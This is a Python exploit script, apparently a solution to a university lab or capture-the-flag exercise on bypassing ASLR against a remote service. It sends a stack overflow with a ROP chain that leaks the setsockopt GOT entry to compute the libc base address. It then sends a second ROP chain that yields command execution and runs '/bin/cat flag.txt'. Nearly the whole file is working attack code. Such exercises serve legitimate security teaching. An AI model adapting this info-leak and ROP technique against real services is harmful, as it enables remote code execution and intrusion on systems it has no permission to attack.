import sys
import struct
import socket
import time
# aslr_common defines p, recvn and mkrop
from aslr_common import *

# remote
host = 'lettieri.iet.unipi.it'
port = 4440

# we first send a ROP chain that will send us the contents of the GOT.
# From the GOT we can learn the addresses of some libc function.
# From the libc.so.6 binary we can learn the offset of these functions.
# The difference between any function's address and its offset is the
# load address of the libc.
# We need any function whose address has already been resolved.
# In the following we choose setsockopt.

# constants
pop_rsi_r15     = p(0x401579)
write_plt       = p(0x401040)
# address of the GOT entry of setsockopt (readelf -r aslr0 | grep '\<setsockopt\>')
got             = p(0x4033f8)
# offset of setsockopt in libc (nm -D libc.so.6 | grep '\<setsockopt\>')
setsockopt_off  = 0xff410

# offset from start-of-buffer to the saved return address
# (obtained by studying the binary)
pad = b'A'*(0x30+8)

# first chain: send us the contents of the GOT
# rdi, rsi and rdx come from the existing call to write, so we
# only need to change rsi
o = pad
o+= pop_rsi_r15
o+= got
o+= b'B'*8      # dummy value for r15
o+= write_plt

s = socket.create_connection((host, port))
s.send(o)
# discard the first len(o) bytes (sent by the legit write() in the code)
recvn(s, len(o))
# read the first 8 bytes (sent by the write() in the above ROP chain)
b = recvn(s, 8)
s.close()
setsockopt_vaddr = struct.unpack('Q', b)[0]

libc_base = setsockopt_vaddr - setsockopt_off

print("libc_base: %x" % libc_base)

rop = mkrop(pad, libc_base)

s = socket.create_connection((host, port))
s.send(rop)
# discard the bytes sent by the legit write()
recvn(s, len(rop))
s.send(b'/bin/cat flag.txt\n')
b = s.recv(200)
sys.stdout.buffer.write(b'flag:      ' + b)
